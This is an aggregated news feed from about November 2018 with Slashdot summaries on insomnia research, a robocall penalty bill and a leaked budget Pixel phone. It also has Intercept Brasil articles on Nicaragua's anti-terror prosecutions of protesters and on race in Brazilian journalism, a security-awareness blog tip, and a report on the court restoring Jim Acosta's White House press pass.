There Is No Link Between Insomnia and Early Death, Study Finds

A new report published in the journal Science Direct says there is no link between insomnia and early death. The researchers reportedly "reviewed 17 studies, which covered close to 37 million people, to compile their results," the BBC notes. From the report: This new report goes against what the NHS says, which claims that as well as putting people at risk of obesity, heart disease and type 2 diabetes, that insomnia shortens life expectancy. The NHS recommends things like exercising to tire yourself out during the day and cutting down on caffeine. It also says smoking, eating too much or drinking alcohol late at night can stop you from sleeping well. Other recommendations include writing a list of things that are playing on your mind and trying to get to bed at a similar time every night. "There was no difference in the odds of mortality for those individuals with symptoms of insomnia when compared to those without symptoms," the study says. "This finding was echoed in the assessment of the rate of mortality in those with and without symptoms of insomnia using the outcomes of multivariate models, with the most complete adjustment for potential confounders, as reported by the individual studies included in this meta-analysis. Additional analyses revealed a tendency for an increased risk of mortality associated with hypnotic use."

Read more of this story at Slashdot.

A New Senate Bill Would Hit Robocallers With Up To a $10,000 Fine For Every Call

Massachusetts Democratic Senator Ed Markey and South Dakota Republican Senator John Thune have introduced a bill on Friday that aims to ramp up the penalties on illegal robocalls and stop scammers from sending them. Gizmodo reports: The Telephone Robocall Abuse Criminal Enforcement and Deterrence (TRACED) Act, raises the penalty for robocalls from $1,500 per call to up to $10,000 per call, and allows the Federal Communications Commission (FCC) to take action on illegal robocalls up to three years after the calls are placed, instead of a year. The Act also aims to push the FCC to work along with the Consumer Financial Protection Bureau, Department of Justice, Department of Homeland Security, Federal Trade Commission (FTC), and other agencies to provide information to Congress about advancements in hindering robocall and prosecuting scammers. Perhaps most importantly for us highly annoyed Americans, the bill would also force phone service providers to use call authentication that filters out illegitimate calls before they go through to consumers.

Read more of this story at Slashdot.

Como a Nicarágua usa leis antiterror contra manifestantes para suprimir dissidentes

Quando Mariela Cerrato viu sua filha e seu genro nas notícias do final de julho, rodeados de policiais mascarados e descritos como terroristas, ela não ficou surpresa. Ela sabia que as autoridades estavam atrás do casal há algum tempo.

O seu negócio havia sido incendiado dias antes e um cartaz de procurados com os rostos deles vinha circulando nas redes sociais. Paramilitares usando toucas ninja haviam ido à casa de Cerrato para exigir que ela revelasse onde a filha e o genro estavam. O que ela não sabia era que o casal vinha se mudando de esconderijo para esconderijo. Na última vez que ela os havia visto, em meados de julho, eles se preparavam para fugir da pequena cidade de Masaya, no oeste da Nicarágua, esperando chegar à Costa Rica.


Agora a filha de Mariela, Maria Peralta, e seu marido, Christian Fajardo, estão em uma cadeia de segurança máxima em Manágua, a capital do país, podendo pegar até 30 anos de prisão. Eles são apenas dois dos mais de 400 ativistas presos e processados como parte do cerco do presidente Daniel Ortega a manifestantes que têm cobrado a sua renúncia.

Mariela Cerrato, cuja filha e genro foram acusados de terrorismo após participar em protestos contra o presidente da Nicarágua, Daniel Ortega.

Mariela Cerrato, cuja filha e genro foram acusados de terrorismo após participar em protestos contra o presidente da Nicarágua, Daniel Ortega.

Foto: Carlos Scopio

A Nicarágua mergulhou em violentas revoltas após o início dos protestos em 18 de abril, provocados por uma mudança pouco popular no sistema de seguridade social do país. As manifestações logo se expandiram, tornando-se um movimento nacional liderado por estudantes contra Ortega, a quem os críticos acusam de ter imposto medidas cada vez mais autoritárias durante seus 12 anos no poder. Milhares de pessoas que foram às ruas encontraram policiais e grupos paramilitares fortemente armados, que atiraram contra a multidão, torturaram e estupraram detidos, além de prender líderes arbitrariamente, segundo a ONU. O saldo foi de mais de 300 mortos, mais de 2 mil feridos e outros 2 mil presos.

Embora as ruas agora já não tenham mais barricadas e pareça que a crise acabou, o país continua profundamente turbulento. Mais de 40 mil nicaraguenses estão buscando refúgio na Costa Rica, segundo as autoridades, e cerca de 13,7 mil deles requisitaram asilo formal. O Centro Nicaraguense de Direitos Humanos diz que mais de 550 cidadãos do país ainda estão presos, e o governo continua a buscar e capturar seus oponentes – entre eles, estudantes, agricultores, e familiares daqueles que foram mortos. No mês passado, a polícia divulgou uma declaração proibindo protestos não autorizados.

Muitos dos que foram presos serão julgados como terroristas, graças a uma lei aprovada em julho pelo Congresso controlado por Ortega, que expandiu a definição de terrorismo para incluir uma série de crimes, como a destruição de propriedade. Quem for condenado poderá pegar de 15 a 20 anos de prisão. De acordo com Roberto Larios, diretor de comunicação dos tribunais, mais de 200 pessoas foram acusadas de terrorismo. Pelo menos 18 delas foram consideradas culpadas até agora. Seus casos marcam a primeira vez que alguém foi condenado por terrorismo na Nicarágua.

O estado diz que a lei foi aprovada para o país ficar de acordo com as recomendações da Financial Action Task Force, a FATF, uma organização internacional dedicada a coibir o financiamento ao terror. Antigos procuradores, advogados, ativistas e manifestantes dizem que, independentemente do objetivo original, a lei agora está sendo usada para criminalizar protestos e serve de pretexto para Ortega silenciar seus críticos.

“A lei é tão aberta que pode ser aplicada a qualquer atividade, até mesmo passar uma bolsa d’água para alguém em uma barricada. (…) O que estamos vendo é uma rebelião civil, uma rebelião social, isso não é terrorismo”, disse Alberto Novoa, um ex-advogado geral da Nicarágua, em uma entrevista a um jornal local.

A Nicarágua não está sozinha quando se trata de expandir sua definição de “terrorismo” até o ponto em que ativistas e manifestantes acabam atrás das grades. Ortega é apenas o mais recente em uma longa lista de governantes que aprovaram leis antiterrorismo abrangentes que, segundo ativistas, podem ser utilizadas para violar liberdades civis. Nas últimas décadas, mais de 140 países adotaram medidas antiterrorismo, mas os países cada vez mais têm usado essas leis como “atalhos para atacar protestos democráticos e oposição”, conforme explicou Fionnuala Ní Aoláin, relatora especial da ONU para a proteção e promoção de direitos humanos na prevenção ao terrorismo. Um relatório das Nações Unidas divulgado este ano destacou a tendência de classificar defensores de direitos humanos, ativistas e especialistas como “terroristas” em países como Argélia, Egito e Filipinas, entre outros. O Centro para Estudos Estratégicos e Internacionais também assinalou que vários países além da Nicarágua utilizaram as medidas antiterrorismo da FATF para justificar a aprovação de leis restritivas nos últimos anos.

“Do Brasil e da Nicarágua à França e ao Reino Unido, ao Quirguistão e à Austrália, estamos vendo repressões que tornam muito fácil rotular manifestantes, jornalistas, ativistas, opositores políticos, e outros que as autoridades querem neutralizar, como ‘terroristas’ e ‘extremistas’”, disse Letta Tayler, uma pesquisadora sênior sobre terrorismo na Human Rights Watch. “Vimos uma perigosa expansão global de leis draconianas antiterrorismo desde os ataques de 11 de setembro de 2001. (…) Como a palavra terrorismo é associada a atrocidades, agora é fácil fazer o público comprar respostas que infringem a lei em nome da segurança.”

“Quando governantes precisam de um inimigo e precisam mobilizar o povo contra aquele inimigo, confundir o povo sobre a verdade, e acabar com o debate, o ‘terrorismo’ agora é uma opção.”

Temores quanto ao Estado Islâmico (ISIS, na sigla em inglês) estimularam um uma avalanche recente de leis em muitos países, disse Taylor. Mesmo na América Latina, onde a ameaça de um ataque do ISIS é remota, a palavra “terrorista” começou a vazar para o discurso público. Honduras aprovou uma legislação antiterror em setembro, que poderia mandar manifestantes à prisão por 15 a 20 anos. Ao contrário da Nicarágua, Honduras não usou a lei contra aqueles que participaram em protestos durante sua crise eleitoral, mas alguns líderes das manifestações continuam presos. No Equador, na Colômbia, e no Chile, ativistas indígenas e ambientalistas foram acusados de terrorismo. Em 2016, o Brasil aprovou uma lei antiterrorismo que foi criticada pela ONU e por especialistas por sua definição ampla de terrorismo. A suprema corte de El Salvador classificou membros de gangues como terroristas e modificou a legislação antiterrorismo existente para implicar também qualquer um que colabore com eles, uma ação que alguns dizem estar sendo usada para justificar repressão e pedir auxílio internacional. A Venezuela aprovou uma controversa lei antiterrorismo em 2012, e o presidente Nicolás Maduro declarou que os protestos de 2017 que tomaram conta do país foram promovidos por “grupos terroristas.”

A Guatemala está considerando uma ampla legislação antiterrorismo que restringiria liberdades civis e a liberdade de expressão, de acordo com grupos da sociedade civil. Pela lei, quem bloquear rodovias, danificar propriedade privada, ou usar as redes sociais com “fins políticos ou econômicos”, entre outras ações que podem causar “pânico e medo na população”, podem ser julgados por terrorismo. Quando governantes precisam de um inimigo e precisam mobilizar o povo contra aquele inimigo, confundir o povo sobre a verdade, e acabar com o debate, o ‘terrorismo’ agora é uma opção,” diz Adam Isacson, um sócio sênior do Washington Office para a América Latina.

Um nicaraguense é preso pela tropa de choque durante protesto contra o governo Ortega, em Manágua, Nicarágua, em 14 de outubro de 2018.

Um nicaraguense é preso pela tropa de choque durante protesto contra o governo Ortega, em Manágua, Nicarágua, em 14 de outubro de 2018.

Foto: Inti Ocon/AFP/Getty Images

Não há uma definição legal universal para o terrorismo, mas, na Nicarágua, atos terroristas agora são definidos como aqueles que resultam em morte, ferimentos ou danos à propriedade – pública ou privada – quando o objetivo do ato era “intimidar uma população, alterar a ordem constitucional ou forçar um governo ou uma organização internacional a efetuar uma ação ou evitar fazê-lo”.

Novoa, o ex-advogado geral, está questionando a nova medida antiterror na justiça, argumentando que a lei é inconstitucional e não deveria se aplicar a manifestantes. “Estou questionando a lei porque eu queria ver se um dia eles me dizem que os argumentos legais lógicos são pelo enfraquecimento dos direitos dos cidadãos estabelecidos no pacto social chamado Constituição Nicaraguense”, ele escreveu ao Intercept em um e-mail. “Independência, autonomia e imparcialidade não existem no estado nicaraguense, pois todos os poderes formais são controlados pelo Sr. Ortega e pela Sra. Murillo”, ele disse, referindo-se à esposa de Ortega, que é a vice-presidente. “O sistema judicial é um braço político da repressão usada contra aqueles que pensam diferente de Ortega e Murillo”.

Julio Montenegro, um advogado de direitos humanos que está lidando com os casos de Christian Fajardo e Maria Peralta, disse que alguns dos indivíduos acusados de terrorismo eram apenas parte de uma barricada nas ruas, trouxeram suprimentos, comida e água para outros manifestantes ou ofereceram cuidados médicos para os feridos. A ONU também demonstrou preocupação quanto aos processos, observando em um relatório contundente que “os julgamentos de pessoas relacionadas aos protestos têm sérias falhas e não seguem o processo devido, incluindo a imparcialidade dos tribunais.”

Como fez Maduro na Venezuela, Ortega usou clássicas táticas autocráticas para esmagar a oposição. O governo negou o papel do estado na violência, e Ortega mudou sua versão várias vezes sobre se os paramilitares mascarados vistos nos vídeos trabalhando ao lado da polícia eram ou não seus apoiadores. Ortega pintou uma imagem dos manifestantes como os únicos causadores do caos e retratou as forças do governo como as defensoras pacíficas do país contra terroristas dedicados a desestabilizar a nação.

Enquanto grupos de direitos humanos dizem que o total de mortes chegou a pelo menos 300, com alguns sugerindo até 500, o governo nicaraguense reconhece somente 198 vítimas, incluindo 22 policiais mortos – em um caso, um oficial foi despido e queimado vivo. Em comícios favoráveis ao governo, os apoiadores do presidente cantam que “eles eram terroristas, não estudantes!” O próprio Ortega clamou por justiça em nome daqueles mortos no lado governista, dizendo que o país entrou em “um momento de justiça e reparação para as 198 vítimas do terrorismo golpista”. Até o momento, nenhum paramilitar ou membro da polícia foi julgado por terrorismo ou qualquer outro crime.

Uma foto de Maria Peralta e Christian Fajardo, que seguem na prisão aguardando julgamento.

Uma foto de Maria Peralta e Christian Fajardo, que seguem na prisão aguardando julgamento.

Foto: Carlos Scopio

Passando pelos vídeos de Fajardo comandando centenas de manifestantes em uma marcha contra o governo em Mayasa, sua sogra, Mariela Cerrato, descrevia seu papel como um líder no movimento. Quando os manifestantes tomaram o controle da cidade em junho, Fajardo e Peralta supervisionaram a campanha, explicou Cerrato. “Se não havia água, comida, luzes, etc., Christian era o responsável. (…) Mas ele não estava nas barricadas – ele não tinha tempo. (…) Tomando declarações, cuidando dos doentes (…) eles estavam abastecendo os postos de saúde que estavam aqui em Masaya”, continuou Mariela, apontando para um canto em sua casa repleto de seringas, curativos e muletas.

Masaya, localizada 24 quilômetros a sudeste de Manágua, foi há muito tempo um bastião do apoio a Ortega e aos seus rebeldes de esquerda, os sandinistas, quando eles derrubaram o ditador conservador Anastasio Somoza em 1979. Mas, em 2018, a cidade tornou-se o centro da resistência contra Ortega. Manifestantes tomaram a cidade, mas a polícia, paramilitares, e atiradores de elite do governo conseguiram reconquistar o controle após uma ofensiva particularmente brutal e sangrenta, na qual forças governamentais utilizaram explosivos, atiraram contra manifestantes e prenderam seus líderes.

“O que é terrorismo? Quando há vontade e intenção de causar pânico nos cidadãos,” disse Montenegro, o advogado de Fajardo e Peralta. “Agressões causando pânico não foram levadas a cabo por Christian e Maria, mas por paramilitares ligados à polícia.”
Além de terrorismo e financiamento ao terrorismo, Fajardo e Peralta foram acusados de participação no crime organizado e obstrução de serviços públicos – crimes para os quais o estado ainda não forneceu evidências para o processo, de acordo com Montenegro. Montenegro e Cerrato, que também é uma advogada constitucional, dizem que o governo violou direitos e contornou o processo devido desde a prisão até o julgamento.

“Os paramilitares vêm e eu olho para eles, pergunto o que eles querem. Se eles quiserem me matar, eles podem me matar.”

No primeiro dia da audiência de Fajardo e Peralta em agosto, Cerrato chegou ao tribunal às 6 da manhã. Às 9, ativistas se juntaram a ela, balançando bandeiras com os rostos do casal, enquanto policiais com toucas ninjas e fuzis M16 os observavam. Como a audiência seguiu sendo atrasada ao longo do dia, ela esperou por 10 horas até finalmente entrar no prédio. Naquela altura, os ativistas e as câmeras de TV já tinham ido embora e ela estava acompanhada por um grupo de cerca de 25 mulheres, todas esperando sob a chuva para entregar comida aos seus parentes e amigos presos. Às 8 da noite, ela voltou para contar que nunca a deixaram entrar na audiência.
Na manhã seguinte, Cerrato caminhou pela casa inacabada da filha e do genro, que fica ao lado da sua. As roupas ainda estavam sobre a cama e um gato de cor branca e alaranjada se esticava no meio da cozinha.

O julgamento do casal agora está marcado para meados de novembro. Nesse intervalo, Cerrato começou a trabalhar em nome de Santiago Fajardo, irmão de Christian, que também foi preso e acusado de terrorismo. Seu esforço não ocorre sem seus perigos. Em uma manifestação da qual ela participou em setembro, pedindo a soltura dos manifestantes presos, a polícia usou gás lacrimogêneo e disparou balas de borracha enquanto apoiadores armados de Ortega abriram fogo – uma pessoa foi morta e cinco outras acabaram feridas.

“Eu estou orgulhosa que esses jovens participaram nessa luta”, ela disse. “Eu não tenho medo. Eu deixo a minha porta aberta. Os paramilitares vêm e eu olho para eles, pergunto o que eles querem. Se eles quiserem me matar, eles podem me matar.”

Tradução: Maíra Santos

The post Como a Nicarágua usa leis antiterror contra manifestantes para suprimir dissidentes appeared first on The Intercept.

Ouça mais Racionais e pague melhor os seus funcionários

‘Intelectual de esquerda’ e ‘playboy’ costumam ser sinônimos. E o grande problema é que o intelectual não sabe disso. Ele acha que playboy é só quem vai pra Miami, compra carro caro e vive uma vidinha culturalmente medíocre. Mas me desculpe: um novo-rico-burguês que ouve sertanejo universitário está mais atualizado sobre a cultura nacional do que alguém que continua achando que o Chico Buarque de 2018 é o Chico Buarque. Não há problema em ouvir o Chico. Foda é só ouvir até o Chico. É como se toda a produção cultural brasileira posterior à redemocratização tivesse sido esquecida.

E a imprensa está recheada desses intelectuais-playboys.

Como explicamos aqui, Olavo Carvalho se tornou o pensador mais influente do Brasil de Bolsonaro afirmando que a esquerda aparelhou a academia e a imprensa encarnando o discurso de defesa aos fracos e oprimidos enquanto garantia seus privilégios particulares. Se considerarmos o que Olavo escreveu, é razoável admitir que, durante o governo Lula, a esquerda foi intelectualmente preguiçosa e se tornou uma cirandinha ao som de Tribalistas. Ela não se ligou que o Brasil continua mudando.

Diametralmente opostos ao Olavo, os Racionais MC’s tentaram nos avisar de coisa parecida. Em 2002, foi lançado o disco “Nada como um dia após o outro dia”. Nele, Brown alerta o ouvinte. E o faz mais de uma vez. Cito aqui duas ocorrências, a primeira na faixa “Negro Drama”:

“Problema com escola, eu tenho mil.
Mil fita. Inacreditável, mas seu filho me imita.
No meio de vocês, ele é o mais esperto.
Ginga e fala gíria. Gíria não; dialeto.”

Defender Lula/Haddad sem compreender o que gerou o bolsonarismo é um pensamento que está, sob a régua do tempo, atrasado. E é por isso que a intelligentsia brasileira é incapaz de conversar com Bolsonaro. Quando ele foi ao Roda Viva em julho e dançou lambada com seus entrevistadores, ele comprovou a ideia de que na relação Lula/Bolsonaro, o incompreendido é o capitão. Ele estava lidando com jornalistas que defendiam as mesmas coisas há anos e não entendiam como uma contraposição daquele tamanho poderia ter surgido.

A intelligentsia brasileira é incapaz de conversar com Bolsonaro.

Sinto muito se você só tomou consciência àquela altura, mas Jair Bolsonaro sabia de cor e salteado quais perguntas viriam daquele jornalismo. Ele era a notícia. A bancada da mídia tradicional brasileira não fazia a menor ideia de como lidar com aquele deputado. Os entrevistadores estavam à beira de um colapso nervoso.

Não acho que a imprensa tenha acompanhado o ritmo da discussão porque ela atuou em regime de emergência para evitar uma catástrofe. Por catástrofe, você pode entender a eleição de Bolsonaro e a ameaça do fim do Estado Democrático de Direito [piauí, Intercept] ou a eleição de Haddad, a tolerância à corrupção e o colapso das instituições políticas do país [Estadão, Gazeta do Povo]. Tanto faz. Nenhum lado esteve disposto a considerar os argumentos de seus opositores.

Por exclusão, o lado que simpatizo do jornalismo é aquele que costumeiramente defende o progressismo. E meu problema com este que eu chamaria de meu lado do jornalismo é que embora ele tenha tentado evitar a vitória de Bolsonaro, ele partilha de uma ética profissional que não incluiu os maiores beneficiados por sua ideologia: os pobres. Em termos mais simples: nós tentamos evitar uma guinada em direção ao conservadorismo quando produzimos informação, mas as redações não são, nem de longe, um ambiente inclusivo. O Bolsonaro ri de nós porque, em termos comparativos, o grupo que produz o pensamento que se opõe a ele tem menos negros do que deveria.

O jornalismo brasileiro me incomoda porque não torna pública a condição de trabalho a que me sujeitou. Ele não admite que prescinde de uma pequena dose de censura dos seus pares e, ainda que não me impeça de falar, não leva o meu argumento a sério.

A gente confunde preto e pobre o tempo inteiro no Brasil. É preciso entender que temos uma doença social que mata os pretos – mas é a negligência da sociedade que impede que qualquer um deixe de ser pobre. São coisas parecidas, mas diferentes. Se você confundir, pode acabar deixando de entender como é que pode um pobre votar no Bolsonaro se ele, teoricamente, diz que vai tomar medidas ativas contra a violência que afetarão diretamente os pretos.

O segundo exemplo dos Racionais está na faixa “Jesus chorou”. Primeiro, a mãe do Brown avisa:

“Paulo, acorda! Pensa no futuro que isso é ilusão.
Os próprio preto não tá nem aí com isso não.
Ó o tanto que eu sofri, o que eu sou, o que eu fui!
A inveja mata um, tem muita gente ruim.”

Brown não tinha como saber, no ano em que o Lula foi eleito e que o Santos foi campeão brasileiro, que ele seria um potencial candidato a maior preto da história do Brasil. Mas ele sabia desde então que não era porque ele estava contando a história da quebrada e que ele era a quebrada inteira.

Pra mim, a mensagem dos Racionais sempre foi essa: não há o que celebrar. Brown escreveu isso em 2002. A conta das mortes de inocentes nunca diminuiu o suficiente pra gente baixar a guarda.

Bolsonaro é um grunhido de 1985, último ano do regime militar, pra avisar que a esquerda intelectual deveria ter ido além do Chico Buarque.

Se a esquerda falhou em captar a mensagem dele, é porque quem acreditou cuidar da cultura popular brasileira foi um clube interessado em manter o seu poder e a sua influência. Tomemos a MPB como exemplo: o termo “música popular brasileira” não é um gênero musical. Ele é um clube. Todos os outros gêneros – samba, funk, reggae, forró, tecnobrega, sertanejo – levam um nome específico por terem especificidades rítmicas e de timbre. A MPB não tem tais características. Se você dá rolê com alguém que faz parte da galera, entra pra galera.

Se ainda recorremos às figuras tarimbadas dos anos 70, é porque os avisos de Brown não adiantaram nada. Se tentamos entender o mundo nos termos que usamos para entendê-lo lá atrás, estamos tão atrasados quanto a ideia de “Brasil acima de tudo, Deus acima de todos” – uma referência clara à “Marcha da Família com Deus Pela Liberdade”, que precedeu a ditadura. A nova direita é honesta pelo menos no que diz respeito à representação orgânica de seus interesses: são ideias de uma burguesia branca, que valoriza o caipira (desde que ele seja latifundiário), gosta de sertanejo, quer andar armada e pede a seu novo presidente que lhe garanta seus direitos. A esquerda é o oposto disso: esvaziada de representação, aparenta ser um grupo cujo discurso é ditado por intelectuais que quase nunca se parecem com o que defendem. Na batalha do atraso, a esquerda perde porque soa mais hipócrita. Não importa o que se defende, mas sim a percepção de que há um grupo que fala da boca pra fora.

Bolsonaro é, no máximo, um grunhido de 1985, último ano do regime militar, pra avisar que a esquerda intelectual deveria ter ido além do Chico Buarque, Sócrates do Corinthians e dos heróis da redemocratização. Estas são as referências de democracia da Folha de S.Paulo, não da humanidade. A esquerda-chique precisa sair do centro do mundo e entender que é normal que as pessoas não gostem de suas ideias.

 

Até aqui, apresentei dois argumentos: no primeiro, tentei comprovar que a oposição ao Bolsonaro na mídia tem uma síncope toda vez que tenta entendê-lo. No segundo, disse que o olavismo cultural e a mensagem dos Racionais dialogam entre si na medida em que nos mostram que a elite sempre fez papel de inocente na tragédia nacional. Ainda que aproximar o pensamento de Olavo das letras dos Racionais seja uma aparente idiotice, é razoável afirmar que o intelectual-playboy torce o nariz igualmente quando precisa estudar de verdade qualquer um dos dois fenômenos. E cada um a sua maneira, ambos são respostas adequadas à realidade observada nos anos 90. Os dois dizem que há alguém tentando falar em nome do povo.

A imprensa nunca vai ter uma opinião fincada na realidade enquanto seus diretores de redação não perderem seus nojinhos. É claro que ninguém é obrigado a se tornar fã de algo que não gosta, mas me parece pouco profissional a ideia de que um jornalista possa ignorar produtos tão relevantes de nossa cultura. Também não é a atual crise financeira do jornalismo quem provoca uma piora sensível no mercado. Ele já era podre por dentro. Já faz uma década desde que as redações começaram a ser enxugadas. Dava tempo de um editor ter concluído que com metade do salário dele, ele lotaria uma redação de estudante preto. Mas eles nunca fizeram isso.

As redações continuaram brancas por escolha, não por contingência.

E fica ainda pior: o jornalismo brasileiro não dá o valor adequado ao trabalho de quem entra agora no mercado porque parte do nosso velho princípio brasileiro de que o conhecimento mora exclusivamente nas redações e nas universidades. É um monte de gente que sequer sabe compreender o valor de profissionais formados pela internet tentando justificar que você pode pagar merreca para um funcionário realizar um trabalho altamente estressante e que se pretende qualificado.

O jornalismo é uma profissão de classe média. Eu e quase todos os meus colegas, quando começamos, topamos ganhar menos de R$ 1.500 para trabalhar em jornadas exaustivas sob a justificativa de que “a profissão é assim mesmo”. Não é.

Seria se a regra valesse para todo mundo. Mas quem me falou isso ganhava mais do que eu e não sabia o valor do meu aluguel. Quem me falou isso ignorava o fato de que só podia contratar funcionários se, em associação com a empresa, os pais destes funcionários ajudassem a pagar o aluguel. Isso acontece em toda profissão, mas na redação de um veículo com gente de esquerda – não que os de direita paguem melhor –, o diretor curte discutir marxismo e fingir que se importa com luta de classes. É a intelligentsia acontecendo. Ao vivaço.

Pra quem não é abastado, com o nível de qualificação exigido para fazer parte de uma redação, trabalhar como vendedor no shopping, fazer bico ou procurar emprego em áreas correlatas da comunicação faz mais sentido – porque dá mais dinheiro. Mesmo no Brasil, não é como se fosse impossível ganhar dois salários mínimos com diploma universitário na mão. As redações continuaram brancas por escolha, não por contingência.

 

Quando você chega à redação de banho tomado, roupa e perfume passados, as pessoas acham que você saiu do mesmo lugar que elas. Acham que o trajeto até o trabalho, o jeito de lidar com os boletos e a realidade que você enfrenta é a mesma que a do Partido Socialismo em Laranjeiras (PSOL), bairro na zona sul do Rio em que a esquerda festiva da cidade costuma se reunir. E quase sempre não é.

Meu vô era preto de cabelo crespo, meu pai era preto de olho verde. Eu nunca me disse preto por aí, ainda que na escola particular eu fosse o preto por contraste. Em qualquer momento da minha vida, eu me sentiria muito hipócrita por pagar de preto porque o Mano Brown me explicou que não podia. “Hey Bacana, Quem te fez tão bom assim?”

Ainda assim, uma vez eu tentei mostrar “Não uso sapato”, do Charlie Brown Jr., pra um colega mais velho que havia feito carreira na Folha. Você pode achar que é batido, mas sabe o que ele fez?

A elite que comanda o jornalismo não entendeu a internet.

Me mostrou “Going to California”, do Led Zeppelin. Tava lá a tripinha branquela do Robert Plant, de colã, cantando pra caralho. Eu sabia quem ele era, mas o comentário me fodeu as ideias: “Isso aí é que é cantar. Olha só!” Já tinha ouvido parecido na faculdade, quando um professor perguntou à turma se a gente “conhecia aquela banda chamada Ramones”.

A elite que comanda o jornalismo não entendeu a internet. A rede tirou o monopólio da fala das redações e da academia. Ser parte da intelligentsia no século 20 exigia dinheiro porque você precisava comprar livros, filmes e discos. Eu baixei tudo. Eu sei o que é o Led Zeppelin porque eu não precisei pagar pra ouvir. O tempo passou e o rock deixou de ser o gênero da moda.

A minha geração é a geração do rap e do hip-hop. Jornalista precisa entender que ser roqueiro, fã da Tropicália e no máximo dos Titãs deixou de ser revolucionário na época da eleição do Collor.

Discorda? Tudo bem. Mas se não conhece, vá ouvir.

 

A revolução que eu defendo só vai conversar com jornalista playboy quando jornalista playboy aprender a falar sobre dinheiro com quem tem menos. Nossa violência inicial é a escravidão. Isso nos faz ter cabeça de senhor e servo. Isso nos faz achar que a gente pode se dar o direito de, depois de ter estudado tanto, fingir que não sabe o que tá acontecendo no mundo real.

Mas é preciso continuar levantando o braço pra dizer que precisamos ver preto em redação. Se são eles quem tentamos defender, então são eles os que precisam estar presentes quando discutimos suas questões. Não só porque devemos nos abster e aliviar a nossa responsabilidade, mas porque precisamos fazer com que nossas tensões profissionais representem melhor a distribuição de identidades da população brasileira. Analisando de longe, tendemos a ter uma visão paternalista, que achata a realidade e quer decidir em nome de terceiros. E se concordamos que esta é uma questão importante, então precisamos chegar a um consenso sobre as razões pelas quais ainda estamos tão distantes de resolver o problema.

Talvez o nosso medo seja uma realização tardia do país que sempre fomos, e não do que nos tornaremos nos próximos quatro anos.

É essencial que todo mundo se acostume a ter colegas pretos. E que se acostume com o que se discute e se discutiu no rap. E que a gente pare de recorrer exclusivamente aos signos de uma época que ficou no passado, esquecendo a geração que cresceu desde então. Os heróis da minha época não foram exilados do Brasil; eles nasceram nos guetos de sua própria pátria.

Talvez estejamos amedrontados porque, finalmente, tomamos consciência sobre o que acontecia de verdade por aqui. Talvez o nosso medo seja uma realização tardia do país que sempre fomos, e não do que nos tornaremos nos próximos quatro anos.

Você pode ter esquecido durante as eleições, mas fazer a coisa certa por aqui nunca foi opinião popular. E se você chegou até o final do texto, eu te pergunto: todo mundo da empresa tem dinheiro pra almoçar contigo?

Se não, volte pra base.

The post Ouça mais Racionais e pague melhor os seus funcionários appeared first on The Intercept.

Mid-Range Google ‘Pixel 3 Lite’ Leaks With Snapdragon 670, Headphone Jack

The first alleged images of the rumored "budget" Pixel 3 have been leaked. The Pixel 3 Lite, as it is being called, looks very similar to the Pixel 3, although it features a plastic build construction, slower processor, and a headphone jack. 9to5Google reports: Just like the standard Pixel 3, there's a display that's roughly 5.56-inches in size, but this time it's an IPS LCD panel at 2220x1080 rather than an OLED panel. Obviously, there's also no notch to be seen on this alleged Pixel 3 Lite. There's a single front-facing camera as well as one speaker above that display, relatively thick bezels on the top and bottom, and a speaker along the bottom of the device as well. Perhaps most interesting when it comes to the hardware, though, is that there's a headphone jack on the top of the phone. That's certainly unexpected since the Pixel 2 dropped the jack and Google hasn't looked back since. Tests from Rozetked reveal some of the specifications running this device as well. That includes a Snapdragon 670 chipset, 4GB of RAM, and 32GB of storage. Previous reports have pointed to a Snapdragon 710. Battery capacity on this device is also reported at 2915 mAh and there's a USB-C port along the bottom. It is rumored to include the same 12MP and 8MP cameras found in the standard Pixel 3 and Pixel 3 XL, which will be a huge selling point for the affordable phone market. The price is expected to be around $400-500.

Read more of this story at Slashdot.

NBlog Nov 17 – all quiet? TOO quiet?


Don’t just hoard your feedback and metrics: use them! Squeeze every last drop of value from them!

It is all too easy to down-play or dismiss comments and especially criticisms about the awareness program. Resist your natural defensive tendencies. Collate and take another, dispassionate look at your awareness metrics and the feedback you have received in recent months concerning information security and/or the awareness and training program. Try to identify common threads or themes that might have escaped your attention previously, or that seem to crop up repeatedly.

This kind of review is best conducted as a team exercise, better still if you persuade some of your most vocal/persistent critics to get actively involved (invite them to your review meetings, give them the floor and listen hard to what they have to say!). SWOT analysis and brainstorming techniques can help tease out genuine concerns and novel ways to tackle them. For example, if your budget is a serious constraint on the awareness program, there may be free/cheap alternatives and more efficient and effective ways of using whatever you have. 

Metrics and verbatim comments from your audience demonstrating demand for and appreciation of your awareness and training activities should make your status reports more positive and budget requests more compelling.

If you aren't getting much in the way of feedback, don’t sit on your laurels.  Perhaps the awareness program is going extremely well but are you really doing enough to encourage feedback, or are people too lazy or too intimidated to respond? Consider commissioning an independent third party to conduct an anonymous survey on your behalf, or at least set aside a few minutes every day to call or visit people to find out what they truly think. Write yourself a basic script if it helps e.g. start by asking questions about current or recent awareness topics and activities/events.

Federal judge reinstates CNN reporter’s press pass after Trump revoked it for critical coverage

trump

In an important victory for press freedom, Federal Judge Timothy Kelly ordered the Trump administration on Friday to temporarily reinstate CNN White House correspondent Jim Acosta’s press credentials.

“We are gratified with this result and we look forward to a full resolution in the coming days,” CNN said in a statement. “Our sincere thanks to all who have supported not just CNN, but a free, strong and independent American press.”

The White House unilaterally revoked Acosta’s press pass last week, following a tense press conference in which Acosta aggressively questioned the president about the special counsel’s Russia investigation.

On November 13, CNN and Acosta filed a lawsuit against Donald Trump as well as other administration officials, alleging that the White House’s suspension of Acosta’s press credentials had violated Acosta’s Fifth Amendment rights.

“Because CNN’s chief White House correspondent has effectively been prohibited from reporting from the White House and the President’s trips, its newsgathering and reporting abilities have been significantly hampered, causing harm not just to CNN, but also to its many viewers and readers who rely on CNN as an essential news source,” reads the complaint by CNN [PDF].

As CNN reported from the court proceedings earlier this week, the Trump administration lawyer  made the rather illuminating argument “that it would be perfectly legal for the White House to revoke a journalist's credentials if it didn't agree with their reporting.”

President Trump has spent his two years in office incessantly threatening his critics and attacking the press. But over and over, Trump has disproportionately targeted and insulted CNN, and specifically Jim Acosta.

When Acosta tried to ask Trump a question days before the president’s inauguration in 2017, he refused. “I’m not going to give you a question,” he said. “You are fake news.”

Jim Acosta’s reporting style is perhaps more direct and belligerent than other reporters with the White House press corps. His willingness to ask Trump tough questions and hold him to answering them is critical in the face of an administration that readily lies and manipulates the truth.

CNN is standing by Acosta, and it’s not the only one. Numerous news organizations — including the Associated Press, Bloomberg, First Look Media, the New York Times, the Washington Post, and Fox News — have filed amicus briefs in support of the lawsuit.

